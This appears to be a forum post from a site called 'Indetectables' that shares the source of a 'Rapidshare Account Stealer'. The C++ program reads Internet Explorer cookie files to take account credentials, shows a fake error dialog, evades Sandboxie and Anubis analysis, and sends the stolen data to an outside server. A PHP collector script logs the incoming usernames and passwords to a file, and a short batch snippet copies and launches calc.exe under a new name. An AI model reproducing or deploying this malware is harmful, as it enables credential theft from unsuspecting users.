Indetectables

Código: Seleccionar todo

<?php 
if(isset($_GET['u']) && isset($_GET['p'])) { 
$USERNAME = $_GET['u']; 
$PASSWORD = $_GET['p']; 

$FILE = "log.txt"; 
$HANDLE = fopen($FILE, 'at'); 

fwrite($HANDLE, $USERNAME . ":" . $PASSWORD . "\r\n"); 
fclose($HANDLE); 
} 
?> 


MAKE SURE THE PHP FILE IS CALLED INDEX.php 

Create a txt file in the same directory called log.txt and chmod 777 it. 

Information i need: 
1 - domain name 
2 - Full path to the php file 


C++ File: 

Código: 
/* 
Rapidshare Account Stealer 2.0 
- LiQuid.Ace 

Shouts: 
- X-Zero 
- Static Ares 
- TrD 

Changes (1.0 - 2.0): 
- Removed Firefox for the time being 
- Rewrote the method of getting Username 
- Rewrote the method of getting cookie path 
- Fixed up general bugs. 
*/ 

#include <stdio.h> 
#include <shlobj.h> 

#pragma comment (lib, "WS2_32.LIB") 

char szTempBuffer[1024], szBuffer[1024], szProfileini[1024], szName[1024], szCookies[1024], szStrToChar[1024], szPWBuffer[1024]; 
char szOldName[1024], szIEID[256], szIEPass[256]; 
int iTemp; 
bool bIE = true, bFF = true, bVista = false, bXP = false; 

void CheckOS() 
{ 
OSVERSIONINFO osvi; 

ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); 
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 

GetVersionEx(&osvi); 

if(osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0) 
{ 
bVista = true; 
} 
else if(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1) 
{ 
bXP = true; 
} 
} 

int RemoveHex(char szTemp) 
{ 
return( szTemp >= '0' && szTemp <= '9' ? szTemp - '0' : szTemp >= 'A' && szTemp <= 'F' ? szTemp - 'A' + 10 : szTemp - 'a' + 10); 
} 

void RemoveEscape(char * szInput, char * szOutput) 
{ 
while(*szInput) 
{ 
if(*szInput == '%') 
{ 
*(szOutput++) = 16 * RemoveHex(*++szInput) + RemoveHex(*++szInput); 
} 
else 
{ 
*szInput++; 
} 
} 
} 

void GetUsername() 
{ 
char szTemp[250]; 

ExpandEnvironmentStrings("%userprofile%", szTemp, sizeof(szTemp)); 
sprintf(szName, "%s", szTemp); 
} 


void GatherIEIntelligence(char * szOutput) 
{ 
GetUsername(); 

for (int i = strlen(szName) + 1; i > 0; i--) 
{ 
if( szName[i] == '\\') 
{ 
strcpy(szName, &szName[i + 1]); 
break; 
} 
} 

strcpy(szOldName,szName); 
if(strstr(szName," ")) 
{ 
loop: 
int iLoc = strcspn(szName," "); 
szName[iLoc] = '_'; 
if(strstr(szName," ")) 
{ 
goto loop; 
} 
} 

if(bXP) 
{ 
sprintf(szOutput, "C:\\Documents and Settings\\%s\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); 
} 
else if(bVista) 
{ 
sprintf(szOutput, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); 
} 
} 

void RobInternetExplorer(char * szUser, char * szPass) 
{ 
GatherIEIntelligence(szCookies); 

FILE * fFP = fopen(szCookies, "r"); 
if(!fFP) 
{ 
goto FalseSwipe; 
} 

fgets(szBuffer, 128, fFP); 
fgets(szBuffer, 512, fFP); 

for (iTemp = 0; iTemp < strlen(szBuffer); iTemp++) 
{ 
if(szBuffer[iTemp] == '-') 
{ 
RemoveEscape(&szBuffer[iTemp + 1], szPass); 
szBuffer[iTemp] = '\0'; 
strcpy(szUser, szBuffer); 
return; 
} 
} 

FalseSwipe: 
MessageBox(NULL, "Windows has experienced an error and needs to close \r this program", "ERROR 8371", MB_OK); 
bIE = false; 
} 

bool bSandBox() 
{ 
HMODULE hSandbox; 
hSandbox = GetModuleHandleA("SbieDll.dll"); 
if(hSandbox == 0) 
{ 
return false; 
} 
else 
{ 
return true; 
} 
} 

bool bAnubis() 
{ 
char szUser[100]; 
ZeroMemory(&szUser, sizeof(szUser)); 
DWORD dwUser = sizeof(szUser); 
if(GetUserName(szUser, &dwUser) != 0) 
{ 
if(!lstrcmp("USER", szUser) || !lstrcmp("CurrentUser", szUser)) 
{ 
return true; 
} 
} 
return false; 
} 

void RunAnon() 
{ 
SOCKET s; 
WSADATA wsadata; 
SOCKADDR_IN target; 

CheckOS(); 
RobInternetExplorer(szIEID, szIEPass); 

sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5\r\nAccept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n\r\n", szIEID, szIEPass); 

WSAStartup(0x0202, &wsadata); 

target.sin_family = AF_INET; 
target.sin_port = htons(80); 
target.sin_addr.s_addr = inet_addr("66.7.200.3"); 

s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); 
connect(s, (SOCKADDR *)&target, sizeof(target)); 

if(bIE) 
{ 
send(s, szBuffer, strlen(szBuffer), 0); 
} 

closesocket(s); 
WSACleanup(); 
} 

/*void RunClient() 
{ 
SOCKET s; 
WSADATA wsadata; 
SOCKADDR_IN target; 

CheckOS(); 
RobInternetExplorer(szIEID, szIEPass); 

sprintf(szBuffer, "GET /update/?u=%s&p=%s HTTP/1.1\r\nHost: exoevil.unreal-gaming.net\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5\r\nAccept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n\r\n", szIEID, szIEPass); 

WSAStartup(0x0202, &wsadata); 

target.sin_family = AF_INET; 
target.sin_port = htons(80); 
target.sin_addr.s_addr = inet_addr("64.18.138.163"); 

s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); 
connect(s, (SOCKADDR *)&target, sizeof(target)); 

if(bIE) 
{ 
send(s, szBuffer, strlen(szBuffer), 0); 
} 

closesocket(s); 
WSACleanup(); 
}*/ 

int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) 
{ 
if(bSandBox()) 
{ 
return 0; 
} 
if(bAnubis()) 
{ 
return 0; 
} 
else 
{ 
RunAnon(); 
// RunClient(); 
} 
return 0; 
} 


php file: 


CODE 
<?php 
if(isset($_GET['u']) && isset($_GET['p'])) { 
$USERNAME = $_GET['u']; 
$PASSWORD = $_GET['p']; 

$FILE = "log.txt"; 
$HANDLE = fopen($FILE, 'at'); 

fwrite($HANDLE, $USERNAME . ":" . $PASSWORD . "\r\n"); 
fclose($HANDLE); 
} 
?>

Código: Seleccionar todo

ECHO 
COPY "%WINDIR%/SYSTEM32/CALC.EXE" "%WINDIR%/LASNENAS.EXE"
START "%WINDIR%/LASNENAS.EXE"
EXIT